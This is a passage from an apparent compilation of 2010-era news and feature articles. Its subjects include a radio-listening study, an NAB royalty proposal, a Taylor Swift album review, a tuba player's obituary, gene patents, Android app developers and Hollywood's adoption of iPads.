The study shows a "tipping point" in radio listening that first happened between 2002-2003, but the "collective momentum" of digital alternatives to terrestrial radio hit a new point by 2007. In 2007, 12-21 year olds' usage of MP3 players overtook what Bridge calls the Bridge Ratings Index (the relationship between weekly radio listening (cume) and favoriteness).

Internet radio began to really impact between 2003-2005 and usage surpassed preference for terrestrial radio in 2006 among 12-21 year olds. Bridge also found that social networking sites passed 12-21 year olds' preference for radio by 2007 and labels it as the "killer activity" that has hurt TSL among younger demographics.

Pulling together the data, Bridge found that "each digital technology contributes to carving off affinity to radio and consumers find it more and more difficult to concentrate on one medium for their entertainment. Short attention span syndrome has been shown to be a function of the increase in multi-tasking by all age groups in recent years."

Bridge notes that there has been less attrition among 18-34 year-olds, though the multiple digital options out there also have taken a toll on this demographic's preference for terrestrial radio as well.

The study concludes that "Listener apathy also has played its part as sharing of music files in the early part of the decade boosted the sexy new tech of MP3 players on the young end while satellite radio's effective marketing blitz - spearheaded by XM in 2002-03 - painted that technology as the next generation of radio; adults have been more apt to adopt this technology. Satellite radio's strong two-year consumer love affair seemed to overshadowed traditional radio in those years as the radio industry searched for revenue solutions that weren't necessarily linked to improving programming content."

"Once terrestrial radio en masse became more proactive by improving programming and marketing around 2005, this analysis shows that for certain demographics, there was an improvement to loyalty."

"This study has been both an exercise in historical perspective and an opportunity to expose the trends that have shaped the competitive landscape for terrestrial radio as new media is adopted over time by the public. Listening levels will continue to be affected by the introduction of new technologies and the adoption by a growing number of consumers of more recent audio tech improvements. As this analysis attests, traditional radio is more resilient than the press would have many believe."

The complete study can be read here.

NAB Endorses Conditions For Performance Royalty

The NAB Radio Board of Directors has voted in favor of a legislative "Term Sheet" tackling the thorny performance rights issue, which will be presented to the musicFIRST coalition.

"NAB remains 100 percent opposed to performance fee legislation pending in Congress," said NAB Radio Board Chair Caroline Beasley, CFO of Beasley Broadcast Group. "However, in a good faith effort to resolve this issue in the best interests of both radio and the music industry, we have endorsed a solution ensuring that broadcasters have a foothold in digital platforms of tomorrow."

"Today's endorsement includes provisions that are essential to the future of free and local radio, and we're hopeful that the musicFIRST Coalition finds it in their best interest to say 'yes' to this proposal," Beasley added.

Under the Term Sheet, music-playing terrestrial radio stations would agree to pay a limited performance fee, which would be set at between 0.25 and one percent of a station's net revenue, depending on a provision related to the penetration of radio-activated mobile phones in the U.S. Today's endorsement from the NAB Radio Board was made with the understanding that any legislative resolution supported by NAB must include the following:

-- Permanent removal of the Copyright Royalty Board from rate-setting of transmissions of terrestrial on-air music or Internet streaming;

-- Resolution of the "AFTRA issue" outside of the legislative process by the musicFIRST coalition that would facilitate simulcast of over-the-air radio commercials on the Internet;

-- musicFIRST's acknowledgment and recognition of the unparalleled promotional value of terrestrial radio airplay;

-- Simplified airplay reporting requirements similar to the model used by ASCAP/BMI;

-- Congressionally-mandated radio-activated chips in mobile devices such as cell phones and BlackBerry smartphones, with an acceptable phase-in period and inclusion of HD Radio chips when economically feasible. If a legislative mandate (which musicFirst has agreed to support) becomes initially unattainable, radio broadcasters would agree to an initial performance fee payment of 0.25 percent of net industry revenue. Under this scenario, the performance fee would mirror the actual percentage of radio-activated mobile phones in the United States. Once market penetration of radio-activated mobile devices reaches and maintains a level of 75 percent of all mobile devices, broadcasters agree to pay the full one percent terrestrial transmission performance fee.

-- Assuming a successful mandate of radio-activated chips in mobile devices, streaming rates that broadcasters pay for simulcasts, webcasts and other non-terrestrial transmissions of music through 2016 would be reduced. In the event that a legislative mandate for radio chips in mobile devices is not achieved, the streaming rate reduction would not take effect until 50 percent of mobile phones have radio chips;

The Term Sheet provides accommodations for small radio station operators, noncommercial stations, religious broadcasters and incidental uses of music by News/Talk and Sports stations.

The Term Sheet also envisions that both the radio and music industry will work cooperatively to offer consumers more and better ways to listen to music.

"From a position of strength, we have fashioned a Term Sheet for resolving the performance fee issue that in the long run is acceptable for radio," said NAB Joint Board Chairman Steve Newberry, President/CEO of Commonwealth Broadcasting. "No broadcaster that I know relishes paying a new fee, but the terms of this agreement provide badly needed certainty for our business to move forward, and the positives of this accord far out-weigh the negatives."

NAB President/CEO Gordon Smith said the Term Sheet "represents a path forward for radio broadcasters and musicFirst to resolve this contentious issue in a manner that is fair and equitable to both sides. Radio stations, artists and the record labels have more commonalities than differences, and adoption of legislation that reflects this Term Sheet will provide a framework for untold new revenue opportunities for both sides. We look forward to working with musicFIRST and its allies for swift legislative adoption of this entire package of initiatives that will help our businesses flourish in the digital age."

Taylor Swift Is Angry, Darn It
Jon Caramanica

FOR pure star-on-star revenge, “Dear John,” from the new Taylor Swift album, “Speak Now,” will be tough to beat. Six and a half minutes long and flagrantly provocative, it’s a deeply uncomfortable song, its protagonist anguished and violated. “Don’t you think I was too young to be messed with?” she asks. “The girl in the dress/Cried the whole way home.”

John Mayer has brought this out in Ms. Swift, awakening her pain, her ire and her creativity. Rather than write a song in her familiar country-pop mode, she’s written an electric blues, its pealing guitar licks a hilarious and pointed reminder of Mr. Mayer, who’s a master of the style. It’s warfare on the level of Jay-Z versus Nas, Oasis versus Blur, Carly Simon versus whomever. (It might explain why, according to Ms. Swift’s Twitter feed, she and her family were recently debating who “You’re So Vain” was about.)

Of course, this being the coy, evasive Ms. Swift, the name John Mayer is never uttered on this song, just as she didn’t say it during a lengthy interview in Nashville last month, just as she will likely never fully confess that the John of the title is Mr. Mayer, with whom she has performed and who tabloids reported she was involved with earlier this year. Still, whatever he did — or whatever Ms. Swift would like to suggest that he did — must have been brutal:

You’ll add my name to the long list of traitors

Who don’t understand

And I’ll look back and regret how I ignored when they said

“Run as fast as you can!”

“I feel like in my music I can be a rebel,” Ms. Swift said at a quiet restaurant not far from her new Nashville apartment. “I can say things I wouldn’t say in real life. I couldn’t put the sentence together the way I could put the song together.” In interviews she’s like her songs, almost revealing. Her communication about communication is as strong as ever.

Ms. Swift, while wide-eyed and easily awestruck, is prim and difficult to ruffle. She is still sometimes treated with kid gloves, as if she were a child star, but Ms. Swift is an adult now; she’ll turn 21 in December. Still, if this is what this preternaturally wise teen star turned 21st-century multimedia celebrity is developing into, bring it on. She is her own TMZ, “Fatal Attraction” by way of Hannah Montana.

“Dear John” is by far the most scorching track on “Speak Now” (Big Machine), which is out on Monday, though plenty of the rest of the album stings. It’s the most savage of her career, and also the most musically diverse. And it’s excellent too, possibly her best.

“Speak Now” is also a bravura work of nontransparent transparency. “I second-guess and overthink and rethink every single thing that I do,” she said.

The album touches on many of the major public events in Ms. Swift’s life the last two years — her conflict with Kanye West at the 2009 MTV Video Music Awards, the sprouting criticisms of her live singing voice, a romantic relationship with the actor Taylor Lautner, rumored dalliances with Mr. Mayer and others — without naming names, relying on fans, critics and tabloids to fill in the blanks.

The great accomplishment of this album, though, is that Ms. Swift is at her most musically adventurous when she’s most incensed. She may not be outgrowing the ethos of tit for tat — righting wrongs is Ms. Swift’s raison d’être — but as an artist, she’s finding new ways to fight back.

This may not have been an inevitability, but it was definitely a necessity. So much has happened in the two years since the release of “Fearless,” Ms. Swift’s second album, that running in place wasn’t an option. Her musical life, which she has advertised as autobiographical since her first single, “Tim McGraw,” four years ago, depends on her version of truth telling. But now that so much of her life unfolds in the public eye, she can’t merely trust that listeners will take her word for things. Hers isn’t the only narrative.

On her first album, “Taylor Swift,” and, to a degree, on “Fearless,” she had little more to do than share her adolescent imagination. Even her darker songs were about poking the hole in the ideal more than any actual trauma. But experience is gaining on her. “This whole apparent growing up that happens,” she called it, with comic dismissal.

In these new songs relationships are no longer fantasies, or neutered; they’re lived-in places, where bodies share space.

“I’ll watch your life in pictures like I used to watch you sleep,” she tells an ex on “Last Kiss.” Other beds are in play too. “She’s not a saint/And she’s not what you think,” she spits out on “Better Than Revenge,” seething over losing someone to a predatory woman. “She’s an actress/But she’s better known for the things that she does on the mattress.”

It’s jarring to hear Ms. Swift talk like that, just like it’s jarring to hear the overwhelming distress of “Dear John,” or “Mean,” a response to a vicious critic. “You have pointed out my flaws again/As if I don’t already see them,” she sings, over a bluegrass-influenced acoustic track unlike anything else she’s yet recorded. Like “Dear John” it takes real-world emotional pain and transforms it into clever art, her choice to go more or less unplugged a slap in the face of doubters.

“Speak Now” also heralds the full arrival of her longtime collaborator Nathan Chapman as a first-rate producer, and not just of the pop-country that’s made Ms. Swift one of the most important new musicians of the decade. He sounds equally comfortable with the blues of “Dear John,” the rootsy sound of “Mean,” the pop-punk of “The Story of Us” and “Better Than Revenge,” and the bruised, anthemic arena-rock of “Haunted.”

That range is likely to be Ms. Swift’s new normal, or the jumping-off point for even more experimentation. The Nashville establishment needs Ms. Swift — a multiplatinum superstar who was the first solo female country singer to win an Album of the Year Grammy, one of four she won earlier this year — far more than she needs it, which means there’s no obstacle to her music becoming country in gesture only.

Certainly there’s no country precedent for a song like “Innocent,” her loving, moody scolding of Mr. West, which had its debut at the MTV Video Music Awards in September.

The incident with Mr. West last year was the first time Ms. Swift’s air of invincibility had been punctured. In a moment she went from grateful and glowing to tough and callused.

In the last year especially, she’s become fair game for the tabloids, which have linked her with Mr. Mayer and Cory Monteith of “Glee” in addition to her exes Mr. Lautner and Joe Jonas of the Jonas Brothers. (Us Weekly is creating a stand-alone issue devoted solely to her, an acknowledgment of her drawing power on the newsstand, and maybe also an act of collaborative savvy on the part of Ms. Swift.)

And after some spotty televised live performances, like her duet with Stevie Nicks at the Grammy Awards, she’s become fair game for critics too. “I’m always going to care,” she said of the backlash. “There’s never going to be a time where I’m going to be nonchalant or casual.” She still takes vocal lessons, and in an incident documented on the blog of the industry pundit Bob Lefsetz, she personally called him after he’d written negative things.

“One of those fears that I never really let myself think is, ‘Is that good because I’m 18?’ ”

Silence, though, is Ms. Swift’s real weapon. In conversation she picks up threads that suit her mood, letting others go. (On whether she’s a feminist: “I have never really thought about that.”) In concert she stands for long periods gazing doe eyed at the crowd as it cheers her, her quiet a signal to remain loud. Even her virtual presence has down moments. Her Twitter feed was notably silent in the days after the 2009 VMAs. “Sometimes you just don’t know what to say, so you don’t say anything,” she said.

While she’s articulate in song, she admits to struggling with feelings in her day-to-day life. “I can say them at a business meeting,” she said of being direct with words. “But for me, saying them to a person that I really care about in whatever sense, whatever capacity, is a little tougher, because it doesn’t have a first verse, second verse and bridge.”

Ms. Swift still believes in the value of the last word; she’s a far better monologuist than dialoguist. And yet her new adversaries aren’t the anonymous crushes of her high school years, probably thrilled just to be alluded to in song, even with darts. They’re celebrities who want to tell their own stories, and undoubtedly will.

At the 2010 Video Music Awards last month Mr. West was able to steal the narrative back from Ms. Swift. Midway through the show she performed “Innocent,” but he closed the show with “Runaway,” which celebrated his boorishness by poking fun at it. His wit trumped her sobriety, a rare loss.

And that’s probably just the beginning. Maybe Mr. Lautner or Mr. Jonas will someday spill the beans about his time with Ms. Swift on “The Howard Stern Show” or in a GQ cover story. After all, their stories don’t only belong to her, and she can only police her own boundaries.

And certainly something loud can be expected of the logorrheic Mr. Mayer, who is probably already working on his cover version of “Dear John,” or maybe even an answer song.

Asked about the possibility, Ms. Swift appeared concerned. “What do I do now?” she said, her brow furrowing for just a second. “I haven’t thought about this.”

Harvey Phillips, a Titan of the Tuba, Dies at 80
Daniel J. Wakin

The tuba players mass by the hundreds every year on the Rockefeller Center ice-skating rink to play carols and other festive fare, a holiday ritual now ingrained in the consciousness of New York.

The tradition began in 1974, the brainchild of Harvey Phillips, a musician called the Heifetz of the tuba. In his time he was the instrument’s chief evangelist, the inspirer of a vast solo repertory, a mentor to generations of players and, more simply, Mr. Tuba.

Most tuba players agree that if their unwieldy instrument has shed any of the bad associations that have clung to it — orchestral clown, herald of grim news, poorly respected back-bencher best when not noticed, good for little more than the “oom” in the oom-pah-pah — it is largely thanks to Mr. Phillips’s efforts. He waged a lifelong campaign to improve the tuba’s image.

Mr. Phillips died on Wednesday at his home, Tubaranch, in Bloomington, Ind., his wife, Carol, said. He was 80 and had Parkinson’s disease.

Like many towering exponents of a musical instrument, Mr. Phillips left a legacy of new works, students and students of students. But even more, he bequeathed an entire culture of tuba-ism: an industry of TubaChristmases (252 cities last year) and tuba minifestivals, mainly at universities, called Octubafests.

“The man was huge in putting the instrument on the map as a solo instrument,” said Alan Baer, the New York Philharmonic’s tuba player, two of whose teachers were Phillips students. “Our repertory is so limited, and it would be horrible if he had not done the amount of work that he did.”

Mrs. Phillips said her husband had either commissioned or inspired more than 200 solo and chamber music pieces, many wheedled out of composers by persistence or other methods. “I remember Persichetti was a case of Beefeater gin,” she said of the composer Vincent Persichetti.

Mr. Phillips once said, “I’m determined that no great composer is ever again going to live out his life without composing a major work for tuba.”

Harvey Phillips was born on Dec. 2, 1929, the last of 10 children, in an Aurora, Mo., farming family. The family moved often, and he attended high school in Marionville, Mo.

After graduating, Mr. Phillips took a summer job playing tuba with the King Bros. Circus. He left to attend the University of Missouri but was quickly lured away by another circus offer: playing tuba with the Ringling Brothers and Barnum & Bailey Circus. It was the pinnacle of circus bands.

One of the band’s duties was to give “alarms”: play pieces to alert circus staff in the case of, say, a high-wire accident. “Twelfth Street Rag” was the alarm for that, a signal to send in the clowns to distract the audience, Mr. Phillips said in a New Yorker profile in 1976. He spent three years with the Ringling band.

On a circus trip to New York, where he played duets with the clanging pipes in his hotel room, Mr. Phillips met William Bell, the tuba player of the New York Philharmonic. Mr. Bell soon arranged for him to study at the Juilliard School and become his pupil.

Mr. Phillips spent two years in the United States Army Field Band in Washington but returned to New York, drawn by the many opportunities. He became a successful freelancer, playing regularly with the New York City Opera and New York City Ballet orchestras, recording and making broadcasts.

In 1954 he helped found the New York Brass Quintet. The combination (two trumpets, French horn, trombone and tuba) was less common at the time than it later became. Brass quintets proliferated, a boon for tuba players, because brass players on university faculties needed a tubist colleague to form a group. More tuba professors meant more tuba students.

Mr. Phillips also played jazz, performing in clubs and recital halls. As his reputation grew, composers began writing for him, and Mr. Phillips introduced another rarity, the tuba recital. In 1975 he played five recitals at Carnegie Recital Hall in nine days.

Writing in The New York Times in 1980, the music critic Peter G. Davis said first-time listeners to Mr. Phillips “could scarcely fail to be impressed, and probably not a little astonished, by the instrument’s versatility and tonal variety, its ability to spin a soft and sweetly lyrical melodic line, to dance lightly and agilely over its entire bass range, and to bellow forth with dramatic power when the occasion demands.”

Mr. Phillips’s entrepreneurial abilities emerged in his New York years, too. He served as the orchestra contractor for Leopold Stokowski, Igor Stravinsky and Gunther Schuller, among others. When Mr. Schuller took charge of the New England Conservatory of Music in Boston, he recruited Mr. Phillips as vice president for financial affairs. Mr. Phillips held the position from 1967 to 1971, commuting to New York for evening performances.

The punishing routine took away from practice and family time. Coming home late one night and missing his family, he took out his tuba while his wife and two of his children slept in the bed nearby and practiced until dawn, playing so softly that they did not wake up, according to the New Yorker profile.

He often practiced in the backseat of his car while his wife drove and their children kept eyes on the road to warn of approaching potholes. “They would yell, ‘Daddy, bump!’ ” Ms. Phillips said.

In addition to Ms. Phillips, Mr. Phillips is survived by their sons, Jesse, Harvey Jr. and Thomas.

In 1971 Mr. Phillips joined the faculty of Indiana University. He retired in 1994.

In his tireless efforts to raise the tuba’s profile as well as to honor Mr. Bell, his teacher, Mr. Phillips — perhaps touched by the showmanship of his circus past — decided to gather tuba players for a special holiday concert in Rockefeller Center. (Mr. Bell was born on Christmas Day, 1902.)

He called an official there with the suggestion. “The phone went silent,” he later recounted. “So I gave the man some unlisted telephone numbers of friends of mine.” They included Stokowski, Leonard Bernstein, André Kostelanetz and Morton Gould. “He called me back in about an hour and said, ‘I’ve spoken with your friends, and you can have anything you want.’ ”

The Tuba Christmas extravaganzas took off. Volunteers hold them around the country under the auspices of the Harvey Phillips Foundation. Sousaphones and euphoniums are also welcome.

At the tubafests, the musicians play “Silent Night” in honor of their fellows who have died, Mrs. Phillips said. On Dec. 8 when tuba players gather again at the skating rink, the carol will be played in Mr. Phillips’s memory.

Click Here to Resurrect the Dead: 3D Printing Brings Pharoah Back to Death
Curt Hopkins

How do you solve a problem like Tutankhamun? Well, if you need to ship his leathery hide around the world - something which would risk damage and sovereignty - you print him of course. In this case, you use 3D printing to create a life-like, or in this case death-like, copy in three dimensions.

Egypt's Supreme Council of Antiquities employed a CT scanner to map the ancient pharaoh's body, all the way through, then used a Materialise Mammoth Stereolithograph to produce an identical copy in the round.

Primarily used for prototyping and small-production runs, the machine uses a photopolymer resin to form the product, in sections about six feet in length. The CT scans are imported and rendered using Materialise's software. Lasers guide the shape, laying down thin sheets until they build up into the figure. A modeler finishes, adding texture and color.

The fake Tut is accurate (or inaccurate depending on your point of view) right down to the famous missing micro-wang.

With all of Howard Carter's Tuthankhamun excavation material now available online, and 3D printing technology getting more common, I wonder if there will come a time when you can print out your own desktop Tut or other historical remains and artifacts in order to better understand them? That'd be cool.

Watch this video on the printing of a pharaoah. It's a nice creepy cross between the Alien films and Dan Simmons' Hyperion Cantos.

U.S. Says Genes Should Not Be Eligible for Patents
Andrew Pollack

Reversing a longstanding policy, the federal government said on Friday that human and other genes should not be eligible for patents because they are part of nature. The new position could have a huge impact on medicine and on the biotechnology industry.

The new position was declared in a friend-of-the-court brief filed by the Department of Justice late Friday in a case involving two human genes linked to breast and ovarian cancer.

“We acknowledge that this conclusion is contrary to the longstanding practice of the Patent and Trademark Office, as well as the practice of the National Institutes of Health and other government agencies that have in the past sought and obtained patents for isolated genomic DNA,” the brief said.

It is not clear if the position in the legal brief, which appears to have been the result of discussions among various government agencies, will be put into effect by the Patent Office.

If it were, it is likely to draw protests from some biotechnology companies that say such patents are vital to the development of diagnostic tests, drugs and the emerging field of personalized medicine, in which drugs are tailored for individual patients based on their genes.

“It’s major when the United States, in a filing, reverses decades of policies on an issue that everyone has been focused on for so long,” said Edward Reines, a patent attorney who represents biotechnology companies.

The issue of gene patents has long been a controversial and emotional one. Opponents say that genes are products of nature, not inventions, and should be the common heritage of mankind. They say that locking up basic genetic information in patents actually impedes medical progress. Proponents say genes isolated from the body are chemicals that are different from those found in the body and therefore are eligible for patents.

The Patent and Trademark Office has sided with the proponents and has issued thousands of patents on genes of various organisms, including on an estimated 20 percent of human genes.

But in its brief, the government said it now believed that the mere isolation of a gene, without further alteration or manipulation, does not change its nature.

“The chemical structure of native human genes is a product of nature, and it is no less a product of nature when that structure is ‘isolated’ from its natural environment than are cotton fibers that have been separated from cotton seeds or coal that has been extracted from the earth,” the brief said.

However, the government suggested such a change would have limited impact on the biotechnology industry because man-made manipulations of DNA, like methods to create genetically modified crops or gene therapies, could still be patented. Dr. James P. Evans, a professor of genetics and medicine at the University of North Carolina, who headed a government advisory task force on gene patents, called the government’s brief “a bit of a landmark, kind of a line in the sand.”

He said that although gene patents had been issued for decades, the patentability of genes had never been examined in court.

That changed when the American Civil Liberties Union and the Public Patent Foundation organized various individuals, medical researchers and societies to file a lawsuit challenging patents held by Myriad Genetics and the University of Utah Research Foundation. The patents cover two genes, BRCA1 and BRCA2, and the over $3,000 analysis Myriad performs on the genes to see if women carry mutations that predispose them to breast and ovarian cancers.

In a surprise ruling in March, Judge Robert W. Sweet of the United States District Court in Manhattan ruled the patents invalid. He said that genes were important for the information they convey, and in that sense, an isolated gene was not really different from a gene in the body. The government said that that ruling prompted it to re-evaluate its policy.

Myriad and the University of Utah have appealed.

Saying that the questions in the case were “of great importance to the national economy, to medical science and to the public health,” the Justice Department filed an amicus brief that sided with neither party. While the government took the plaintiffs’ side on the issue of isolated DNA, it sided with Myriad on patentability of manipulated DNA.

Myriad and the plaintiffs did not comment on the government’s brief by deadline for this article.

Mr. Reines, the attorney, who is with the firm of Weil Gotshal & Manges and is not involved in the main part of the Myriad case, said he thought the Patent Office opposed the new position but was overruled by other agencies. A hint is that no lawyer from the Patent Office was listed on the brief.

Turning Customers Into Creators
Jenna Wortham

A FEW young women are gathered around a conference table dotted with bottles of colorful vitamin drinks, iPod cables and slender laptops. A whiteboard with lime-green writing almost swallows a wall in the room.

One bites her lip; another taps lightly on the table. They’re all quiet, deep in thought, as they decide whether it would be a good idea to add a music feature to the Web site they’re working on — a new online shopping site called PlumWillow.

“The problem,” says one of them, Sarah Murphy, “is that there are so many genres of music that it’d be hard to get it right what people want to listen to.”

“Right,” Carla Larin concurs, tossing her wavy brown hair. “But it’d be cool to have, like, a PlumWillow station full of songs we think are cool.”

None of these girls are the company’s founders, nor are they social media consultants. They aren’t at PlumWillow’s office for “take your daughter to work day,” either.

Rather, they’re part of a team of 15- and 16-year-old interns who are being tapped for their own special brand of expertise and insight: a bird’s-eye view into the life and mind of high school teenagers, exactly the audience that PlumWillow is seeking.

“They definitely aren’t shy about telling us what they like and don’t like,” says Lindsay Anvik, director of marketing at PlumWillow, who helps oversee the internship program at its offices in Manhattan.

The interns are also emblematic of how Web-based businesses are doing more than merely shaping their products and services around customer preferences. The companies are corralling those customers in the workplace and making them part of the design and marketing process, according to Susan Etlinger, a consultant at the Altimeter Group, which researches Web technologies and advises companies on how to use them.

Of course, search engines like Google and Bing have been racing to tailor their results to individual users, and Facebook is constantly tweaking its algorithm to show members’ updates and the Web links that are most relevant to them.

But what’s happening at PlumWillow is a sign of an even more intimate relationship between a company and its customers.

Moving beyond “the old-fashioned focus group and into co-creation with your demographic is something that will happen more in the next couple of years,” Ms. Etlinger says. “All business will have to learn how to cope with a new generation of users that are used to their particular experience of the Web.”

Because PlumWillow wants to be more than just an online shopping destination — it’s tackling the tricky challenge of recreating the experience of a gaggle of girls going to the mall — its success hinges on getting all the details right, down to the pop songs that girls want to hear while hunting for a new pair of slouchy ankle boots.

“The site needs to be authentic to their voice and how they shop,” says Charlie Federman, PlumWillow’s chairman, whose venture capital firm also led a round of seed funding in the company. “Adults trying to recreate that are just asking for trouble because these kids are smart and sophisticated and know when something is phony.”

The girls were initially brought on as a “sanity test,” Mr. Federman says. “We were all excited and talking about this great idea when we realized a wise thing to do would be to actually talk to some teen girls.”

Once the conversation began, the dynamic changed.

“It went from us talking to them to us listening to them,” says Scott Stone, co-founder and head of business development at PlumWillow. “We decided we might as well institutionalize it and make it part of our culture.”

Two days a week, Ms. Anvik and Tal Flanchraych, the product manager, grill the girls on all kinds of topics, asking whether the site’s comment system is too confusing, for example, or brainstorming about prizes for the site’s Halloween contest.

“Then we go back to our desks and regurgitate everything and think about how it fits into our future planning,” Ms. Flanchraych says.

Nearly 20 girls have cycled through the company since early this year, PlumWillow says.

They help keep the company nimble enough to catch and fix mistakes before they are pushed out to broader audiences, executives say.

“We watch what they click on, see what they do and how they use the site,” says Eric David Benari, another of the site’s founders and its chief technology officer. “It’s not something we can do virtually.”

It’s nothing new for companies to gather input from audiences they serve. Gap recently reverted to its boxy old logo after users complained about a new design. Twitter famously formalized the shorthand of its users as the site began to balloon in popularity.

PlumWillow doesn’t want to wait until it hears — positively or negatively — from its customer. It wants customers in-house so it can always be ahead of the curve.

For PlumWillow, however, the trick is to find a balance between its own strategic direction and fickle consumer feedback.

“You don’t want to put a bunch of teenagers in charge of the site, but they are revealing the way they think about it, which can be extremely useful for a start-up,” says Josh Bernoff, an analyst at Forrester Research. “If you go too far in one direction, you become like a politician pandering to its audience.”

FOR all the effort that the girls are putting into the site, what do they get in return? School credit and ripe material for college application essays, for starters.

But there may be something more in it for them. While many of their peers may spend their internships doing office work at various companies, the PlumWillow interns are getting a taste of the challenges of entrepreneurship.

“I loved seeing the whole process from start to finish,” Ms. Larin says. “Six months ago we were looking at PDFs of the site; now we have the live version that we helped create. It’s incredibly cool to see.”

Russian Hacker Builds 70 Terabyte Home Computer
David Daw

Ever find yourself deleting some files to make room for your overgrown media collection? Thanks to a new hack from a Russian PC enthusiast you should have plenty of room for your MP3 collection, along with the collections of everybody else you know. The hack consists of an array of 60 hard drives and the whole thing holds a whopping 70 terabytes of data.

That translates to 70,000 DVD-quality movies or, if you’re more musically inclined, somewhere in the neighborhood of 24 million songs. Of course, that kind of storage space doesn’t come easy. Besides the 60 drives themselves the rig requires 40 cooling fans to keep the temperature under control.

The final package may not win any awards for case design but the whole thing has a certain kind of stark utilitarian beauty to it. Presumably the unnamed maker is keeping the case open so he can switch the set up out with even heftier drives as they come along to keep the project from looking like an absurd relic a decade or so from now thanks to the storage equivalent to Moore’s Law.

App Makers Take Interest in Android
Jenna Wortham

There was cold beer, hot pizza and shop talk at a recent informal gathering of Android programmers in downtown Manhattan. Inevitably the chatter turned to money.

One software developer, James Englert, 26, had just released his first application for Android, Google’s operating system for cellphones. When asked, he tossed out an estimate for his take from sales of the app, a simple program that shows train schedules: “$1 to $2 per day.”

The room erupted with laughter. “That’s pretty good money,” he protested over the clamor.

The others could relate to Mr. Englert’s situation because writing Android software is not yet a ticket to financial success. Even as Android sales surge — Google says it is now activating around 200,000 phones a day — the market for Android apps still seems anemic compared with that for Apple and its thriving App Store.

Experts and developers say that is in part because the Android Market, the dominant store for Android apps, has some clunky features that can be annoying to phone owners who are eager to make a quick purchase. For starters, Android uses Google Checkout rather than an online payment system that more people are familiar with, like PayPal. As a result, many Android developers make their apps available free and rely on mobile advertisements to cover the cost.

“It’s not the best impulse-buy environment,” said Matt Hall, co-founder of a developer outfit called Larva Labs that makes games for Android, iPhone and BlackBerry devices. “It’s hard to think of an application that you would sit there and put your credit card information in for.”

But that tide is starting to turn as Android’s popularity continues to swell and Google takes steps to smooth out some of the wrinkles. For example, the Android Market recently began showing app prices in a user’s local currency, rather than that of the developer.

“We’re still seeing the 1.0 version of the ecosystem,” said Andy Rubin, vice president of engineering at Google and one of the primary architects behind Android. “We think about it every day, how to minimize some of the friction to help the ecosystem rise with the platform.”

Mr. Rubin said there were 270,000 developers writing software for Android, and the number of programs available for download in the Android Market has swelled to more than 100,000, a threefold increase since March.

Developers can feel the shift in momentum. “I used to tell people I wrote software for Android, and they’d look at me like I had three heads,” said Michael Novak, who handles Android development at Medialets, a mobile advertising software company, and helps organize the monthly New York Android Software Developers Meetup. “That wasn’t even a year ago. Now everyone knows what it is. The popularity has exploded.”

Perhaps the biggest point of friction for Android is the same thing that led to its success.

Because Google makes its software available free to a range of phone manufacturers, there are dozens of different Android-compatible devices on the market, each with different screen sizes, memory capacities, processor speeds and graphics capabilities. An app that works beautifully on, say, a Motorola Droid might suffer from glitches on a phone made by HTC. IPhone developers, meanwhile, need to worry about only a few devices: iPhones, iPods and iPads.

When Rovio, the Finnish software development company behind the popular iPhone game Angry Birds, decided to release a version for Android, the company spent months testing the game on a variety of devices to make sure it was up to par.

“It’s so fragmented,” said Peter Vesterbacka, a developer at the company. “It’s a lot more challenging than developing for one device, like the iPhone.”

In the end, he said, it was worth the trouble. The game was downloaded more than three million times in the first week. But the company, which charges 99 cents for the iPhone version and has made millions of dollars that way, chose to give away the Android version and include ads. This is in part because paid apps on the Android Market are available in only 32 countries, versus 90 for the Apple App Store, and Rovio was concerned that people who were not able to purchase the app would just pirate it.

But developers also say that charging for apps simply may not be the path to profit on Android.

“Google is not associated with things you pay for, and Android is an extension of that,” said Mr. Hall of Larva Labs. “You don’t pay for Google apps, so it bleeds into the expectations for the third-party apps, too.”

Google says it eventually hopes to introduce a transaction feature for Android software that will allow purchases within apps, to help developers make more money.

Developers do say that the freedom of Android is a welcome alternative to Apple’s tight control. Android developers have more rein to tinker with the phone’s native functions, like the address book and the basic interface, something Apple has not always allowed. And Apple screens all apps before they can reach its store, while Google imposes no such restriction, relying on Android users to flag malicious or offensive apps.

“With Apple, you can spend months writing software only to be denied,” Mr. Novak said. “The biggest reward as a developer is getting your software out there, and quick. That makes everything else worthwhile.”

Also unlike Apple, Google does not charge developers to download its software development kit, the tools needed to write apps.

Developers are not abandoning iPhone for Android. Instead, they say they are slowly starting to devote more resources to Android in the hope that those efforts will pay off.

They also note that it is a lot easier to stand out in a pool of 100,000 apps versus 300,000, the current tally for the Apple App Store.

“Apple’s App Store is getting overcrowded and saturated,” said Eric Metois, a freelance tech consultant who writes apps on the side for the iPhone and Android.

Mr. Metois’s first iPhone app, iChalky, featuring a dancing stick figure, has sold more than 300,000 copies on the iPhone since it was released in December 2008. His second attempt, a game called Sparticle, was not as successful.

“I poured 500 hours into my second app on the iPhone and sold virtually no copies,” Mr. Metois said. In explaining why he recently released an Android version of iChalky, he said, “There was a chance that on another emerging platform, iChalky would have a similar amount of success.”

Analysts say that if Google wants its mobile software to succeed, it will need to make sure that developers do not lose patience with Android — particularly in light of new competition, including the slate of Windows 7 phones from Microsoft and the iPhone’s inevitable expansion to other carriers in the United States besides AT&T.

Mr. Rubin said he was not worried about rivals’ tempering the momentum of Android because he believed its future would stretch past the cellphone, to tablets and other devices yet to be conceived.

“The promise of Android goes beyond one device,” Mr. Rubin said. “We’re going to see products running Android that no one has ever envisioned possible.”

Pitching Movies or Filming Shows, Hollywood Is Hooked on iPads
Brian Stelter

Last month at a meeting in Hollywood, it was time to plot out the sequel to “Star Trek,” last year’s blockbuster reboot of the sci-fi franchise.

The attendees all brought smartphones — gadgets far more powerful than the videophones imagined by the “Star Trek” writers 40 years ago. Bob Orci brought something the writers back then could only dream of: an iPad.

Mr. Orci, meeting with the producers J. J. Abrams, Damon Lindelof and Bryan Burk, and his fellow writer Alex Kurtzman, jump-started the discussion with an iPad slide show, showing stills from the first film, snapshots of potential locations and a photo of a suggested actress for one of the roles. On the woman’s photo, he had used his iPad to paint on a Vulcan ear.

“When you’re carrying a little TV around, you bring the power of imagery to places that you don’t normally have it,” Mr. Orci said in an interview.

When Apple introduced the iPad six months ago, ushering in an era of tablet computing, experts predicted that tablets would transform the habits of groups of people like college students (who would carry digital textbooks) and doctors (who would manage patient records). They can add Hollywood to the list of those affected.

The iPad is the must-carry accessory on sound stages this season, visible behind the scenes of television and film shoots and in business meetings. When Paula Abdul, the former “American Idol” judge, wants to preview her new dance show for prospective sponsors, she turns on her iPad and pulls up a YouTube video. When Julie Benz, a star of “No Ordinary Family” on ABC, has downtime between shoots, she plays Angry Birds, the popular physics-based puzzle game.

